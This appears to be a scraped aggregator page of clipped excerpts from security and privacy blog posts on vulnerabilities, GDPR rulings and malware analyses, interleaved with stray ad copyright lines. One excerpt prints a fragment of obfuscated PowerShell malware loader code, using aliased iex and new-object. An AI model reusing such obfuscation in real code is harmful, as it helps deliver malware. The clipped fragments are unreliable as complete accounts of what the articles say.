Security Affairs

JULY 22, 2020

The company has published a blog post explaining how the weakness can be exploited by a local attacker to escalate privileges to SYSTEM and remotely for arbitrary command execution. ” reads a blog post published by researchers from Pen Test Partners that discovered the flaw. Citric has released versions 1912 LTSR CU1 and 2006.1

Honeypots 82

Honeypots IT Access Security 82

Hunton Privacy

JULY 13, 2020

The case stems from a complaint filed by privacy advocate Max Schrems with the Irish Data Protection Commissioner (“Irish DPA”) in 2015, challenging Facebook Ireland’s use of the SCCs to transfer personal data to Facebook Inc. At present, most businesses are preparing to use SCCs for these transfers. Background to Schrems II. in the U.S.

Personal data 88

Personal data Privacy GDPR Risk 88

Security Affairs

MAY 15, 2019

This month, there are no critical or Hot News notes published, but there are three High Priority Notes, as well as two other SAP Security Notes affecting SAP Solution Manager (reported by the Onapsis Research Labs).” ” reads a blog post published by SAP security firm Onapsis. Two flaws received a CVSS score of 6.3,

Security 66

Security Financial Services Risk IT 66

Security Affairs

MAY 13, 2019

Below some considerations made by the expert in a blog post published on Medium: By looking the onReceive method of the SwitcherBroadcastReceiver, we are able to deduce that This receiver: expect com.samsung.android.knox.containeragent.LocalCommandReceiver.ACTION_COMMAND as an action.

Security 91

Security IT Information Security 91

Security Affairs

SEPTEMBER 30, 2019

“This blog post will provide overviews and proof of concepts for both browser exploits. The first exploit that we reported on April 11, 2019 impacts Chrome versions prior to 75 on iOS. Copyright (C) 2014-2015 Media.net Advertising FZ-LLC All Rights Reserved -->. ” reads the analysis published by Confiant.

Security 77

Security IT Information Security 77

Data Matters

JANUARY 14, 2019

See CT Gen Stat § 38a-999b (2015) ; 23 NYCRR 500. (For For more information on South Carolina’s adoption of the Model Law, see our prior coverage.) . 11 to the Ohio Revised Code. Ohio enacted the Model Law in the form of Ohio SB273 (Act), which, inter alia , adds Sections 3965.01-11 O.R.C. §§ 3965.02, 3965.08.

Insurance 68

Insurance Security Cybersecurity Data breaches 68

Security Affairs

NOVEMBER 6, 2019

. “Today we are also reaching out to roughly 100 partners who may have accessed this information since we announced restrictions to the Groups API, although it’s likely that the number that actually did is smaller and decreased over time.” ” reads the blog post published by Facebook. ” continues the post.

Privacy 55

Privacy Access Security IT 55

Security Affairs

JUNE 16, 2019

MS Web Services Client Protocol 2.0.50727.5485) @JAMESWT_MHT pic.twitter.com/rV0wzpulgW — JTHL (@JayTHL) May 11, 2019. Recently security experts reported ongoing attacks targeting millions of mail servers running vulnerable Exim mail transfer agent (MTA) versions. reads a blog post published by Cybereason. “We

Phishing 103

Phishing Authentication Cloud Security 103

Security Affairs

OCTOBER 20, 2019

The best news of the week with Security Affairs. Hi folk, let me inform you that I suspended the newsletter service, anyway I’ll continue to provide you a list of published posts every week through the blog. Talos experts found 11 flaws in Schneider Electric Modicon Controllers. Pierluigi Paganini.

Security 43

Security Ransomware Data breaches Manufacturing 43

Security Affairs

JANUARY 16, 2020

” wrote Seeley in a blog post. “The Cisco Product Security Incident Response Team (PSIRT) is aware that proof-of-concept exploit code is available for the vulnerabilities that are described in this advisory.” “ ~ Copyright (C) 2014-2015 Media.net Advertising FZ-LLC All Rights Reserved -->.

Authentication 59

Authentication Security Access IT 59

Security Affairs

OCTOBER 6, 2020

Figure 11: Zerologon detection ([link]. Pedro Tavares is a professional in the field of information security, working as an Ethical Hacker, Malware Analyst, Cybersecurity Analyst and also a Security Evangelist. Copyright (C) 2014-2015 Media.net Advertising FZ-LLC All Rights Reserved -->.

Communications 102

Communications Passwords Authentication Security 102

Security Affairs

APRIL 16, 2020

Figure 11: Landing-page URL provided by the C2 server. Figure 12: C2 geolocation – Brazil.bulacha: Class that implements the methods used for information exfiltration, SMS management, etc. He is also a founding member and Pentester at CSIRT.UBI and founder of the security computer blog seguranca–informatica.pt.

Authentication 121

Authentication Phishing Data structuring Access 121

Security Affairs

OCTOBER 14, 2019

First of all the attacker knew the target organization was protected by a SOC (Security Operation Center) so she sent a well crafted email claiming to deliver a Microsoft document wrapping out the weekly SOC report as a normal activity in order to induce the victim to open-it. SOC report 10 12 2019.doc Technical Analysis. Pierluigi Paganini.

Computer and Electronics 75

Computer and Electronics Security Encryption IT 75

Security Affairs

MAY 12, 2020

Figure 11: Embarcadero Delphi version used in December 2019 also observed in May 2020. Pedro Tavares is a professional in the field of information security, working as an Ethical Hacker, Malware Analyst, Cybersecurity Analyst and also a Security Evangelist.

Cloud 106

Cloud Government Access Phishing 106

Data Matters

FEBRUARY 26, 2019

power grid because “many of the violations involved long durations, multiple instances of noncompliance, and repeated failures to implement physical and cyber security protections.” A clear theme throughout the settlement is the necessity to create a top-down, enterprise-wide culture of compliance and cyber risk management.

Energy and Utilities 68

Energy and Utilities Compliance Cybersecurity Risk 68

IT Governance

DECEMBER 13, 2018

This week, in our last podcast of the year, we revisit some of the biggest information security stories from the past 12 months. As is now traditional, I’ve installed myself in the porter’s chair next to the fire in the library, ready to recap some of the year’s more newsworthy information security events.

Data breaches 64

Data breaches Personal data Access GDPR 64

Security Affairs

JULY 30, 2019

Technical details, including Indicator of compromise and Yara rules are reported in the analysis published on the Yoroi blog : [link]. Copyright (C) 2014-2015 Media.net Advertising FZ-LLC All Rights Reserved -->. Security Affairs – Java ATM malware, hacking). 18” ) stored in the “urlreport” variable. Pierluigi Paganini.

Financial Services 90

Financial Services Communications Access IT 90

Security Affairs

SEPTEMBER 4, 2019

Figure 11: Mutex creation. Technical details, including IoCs and Yara Rules, are available in the analysis published the Yoroi blog. Copyright (C) 2014-2015 Media.net Advertising FZ-LLC All Rights Reserved -->. Figure 10: Parameters for the “CryptEncrypt” function. Conclusion. Pierluigi Paganini.

Ransomware 81

Ransomware Encryption File names Libraries 81

Security Affairs

JUNE 11, 2019

Resulting in the following snippet: (“{0}{1}”-f ‘s’,’al’) Dfi iex; (“{0}{1}” -f’Sa’,’l’) L new-objeCt;${c1}=(((“{6}{3}{10}{4}{8}{5}{2}{11}{1}{9}{0}{7}” -f ‘w’,’aw’,’Name D’,’dd-T’,’-A’,’bly’,’A’,’;’,’ssem’,’ingD6?,’ype 0 (6c’,’0?)))+(“{5}{1}{9}{7}{12}{2}{0}{11}{8}{3}{6}{10}{4}”-f ‘6’,’0+’,’in’,’6c0+6c0 ‘,’ ‘,’0s6c’,’x64;6? fo’,’tindef.6?,’a’,’d6c0+’,’/6c0+6c0///6c0+6c0/6c0+6c0/6c’,’c’,’c0in6c0+6c’,’6c0+6c0/’,’0+6?,’0?,’ps:6?,’0+6c0?,’newup’)))+(“{3}{5}{0}{1}{2}{4}”-f

e-Delivery 70

e-Delivery Encryption Libraries IT 70

Security Affairs

MAY 23, 2019

Further technical details, including IoCs and Yara rules are reported in the original analysis published on the Yoroi blog: [link]. If you appreciate my effort in spreading cybersecurity awareness, please vote for Security Affairs in the section “Your Vote for the Best EU Security Tweeter” Thank you.

Security 82

Security Phishing Encryption IT 82

Security Affairs

JUNE 14, 2019

Figure 10: Other information about “non.exe” NanoCore RAT and relative compiled language. Figure 11: Version of NanoCore Client. Technical details, including IoCs and Yara Rules, are available in the analysis published in the Yoroi blog. Copyright (C) 2014-2015 Media.net Advertising FZ-LLC All Rights Reserved -->.

Encryption 81

Encryption Archiving Communications IT 81

Security Affairs

MAY 29, 2019

If you appreciate my effort in spreading cybersecurity awareness, please vote for Security Affairs in the section “Your Vote for the Best EU Security Tweeter” Thank you. Technical details, including IoCs and Yara Rules, are available in the analysis published in the Yoroi blog. C2’s parameters. The TA505 Connection.

IT 66

IT Retail Archiving File names 66

Security Affairs

AUGUST 6, 2019

Figure 11: Comparison among RevengeRAT belonging to different campaigns. Anyway, as shown in Figure 11, the ID and Mutex of the last two campaigns are the same, indicating the fact that the group is active and the infection campaign continues. Copyright (C) 2014-2015 Media.net Advertising FZ-LLC All Rights Reserved -->.

Libraries 62

Libraries IT Education Security 62

Security Affairs

APRIL 10, 2019

As we can see below (Figure 11 and 12), and to reinforce the packer presence, some sections are null name values, and other ones have high entropy (around 8.0). Figure 11 below illustrates in middle that great part this file is really packed. Figure 11: Emotet file entropy. Figure 10: EMOTET section entropy.

Security 59

Security IT Access Cybersecurity 59

Security Affairs

JULY 17, 2019

Figure 11: Malicious resource retrieving routine. Further technical details, including IoCs and Yara rules are reported in the analysis published on the Yoroi blog: [link]. Copyright (C) 2014-2015 Media.net Advertising FZ-LLC All Rights Reserved -->. It is the encrypted final payload. Pierluigi Paganini.

Passwords 72

Passwords Encryption IT Sales 72

Security Affairs

NOVEMBER 12, 2019

That stage implements an obfuscated Javascript embedded code which decodes, by using a XOR with key=11, a third Javascript stage acting as drop and execute on 66.133.129.5 I am a computer security scientist with an intensive hacking background. Copyright (C) 2014-2015 Media.net Advertising FZ-LLC All Rights Reserved -->.

Computer and Electronics 42

Computer and Electronics Ransomware Security Retail 42

Security Affairs

MAY 27, 2020

Figure 11: List of the Portuguese banks included in the Grandoreiro version of May 2020. Pedro Tavares is a professional in the field of information security, working as an Ethical Hacker, Malware Analyst, Cybersecurity Analyst and also a Security Evangelist.

Communications 66

Communications Archiving Access IT 66

Security Affairs

DECEMBER 29, 2019

Figure 11: First stage of the Lampion malware – obfuscated code. About the author Pedro Tavares: Pedro Tavares is a professional in the field of information security working as an Ethical Hacker, Malware Analyst and also a Security Evangelist. Copyright (C) 2014-2015 Media.net Advertising FZ-LLC All Rights Reserved -->.

Passwords 95

Passwords e-Discovery IT Cleanup 95

Security Affairs

MARCH 2, 2019

Pedro Tavares is a professional in the field of information security working as an Ethical Hacker, Malware Analyst and also a Security Evangelist. He is also a founding member and Pentester at CSIRT.UBI and founder of the security computer blog seguranca – informatica. Option flags in BOUNDSHEET record.

File names 85

File names Phishing Libraries IT 85

ForAllSecure

JUNE 2, 2021

His approachable style and his desire to teach others what he’s learned about information security has resulted in a massive following of half a million subscribers. We share blog posts, we share our code, you can look at code on GitHub. So I think I started in March 2015 and in December 2015. Check it out.

Marketing 52

Marketing Education IT Security 52

ForAllSecure

JUNE 2, 2021

His approachable style and his desire to teach others what he’s learned about information security has resulted in a massive following of half a million subscribers. We share blog posts, we share our code, you can look at code on GitHub. So I think I started in March 2015 and in December 2015. Check it out.

Marketing 52

Marketing Education IT Security 52

Security Affairs

JUNE 4, 2019

The group was first discovered by Symantec and TrendMicro in 2015 but evidence of its activities has been dated back to 2013. Information about C2 and relative DNS. POST request sent to C2 with victim machine information. Copyright (C) 2014-2015 Media.net Advertising FZ-LLC All Rights Reserved -->. Pierluigi Paganini.

Archiving 61

Archiving Passwords File names Military 61

Security Affairs

JULY 7, 2020

This time it is not used to transfer information about the infected machine through an HTTP call with the destination C2, but TCP sockets are used. Figure 11: Banking organizations found inside the malware are the same as document in the past. Copyright (C) 2014-2015 Media.net Advertising FZ-LLC All Rights Reserved -->.

Communications 93

Communications Cloud Phishing Encryption 93

Security Affairs

SEPTEMBER 11, 2019

Code used to extract information about system. These information are then sent to the command and control server during the check-in phase of the Javascript loader, along with the list of running processes. Technical details, including IoCs and Yara Rules, are available in the analysis published the Yoroi blog.

Cleanup 78

Cleanup Ransomware IT Security 78

Security Affairs

OCTOBER 4, 2019

Figure 11: Comparison between old and new version on “config.ini” file. Experts published a post on the Yoroi blog: [link]. Copyright (C) 2014-2015 Media.net Advertising FZ-LLC All Rights Reserved -->. Conclusion. sLoad is keeping evolving their TTPs and represents a vivid threat for the Italian cyber-panorama.

Archiving 82

Archiving Encryption IT Phishing 82

Security Affairs

FEBRUARY 19, 2019

Figure 11: Binary data overview. Pedro Tavares is a professional in the field of information security working as an Ethical Hacker, Malware Analyst and also a Security Evangelist. He is also a founding member and Pentester at CSIRT.UBI and founder of the security computer blog seguranca – informatica.

Phishing 77

Phishing IT Security Encryption 77

Security Affairs

JULY 2, 2019

Technical details, including IoCs and Yara Rules, are available in the analysis published in the Yoroi blog. Copyright (C) 2014-2015 Media.net Advertising FZ-LLC All Rights Reserved -->. HTTP-TOR proxy services used by the malware. Conclusion. Copyright (C) 2014 Media.net Advertising FZ-LLC All Rights Reserved -->. Pierluigi Paganini.

Ransomware 92

Ransomware Encryption Blockchain Libraries 92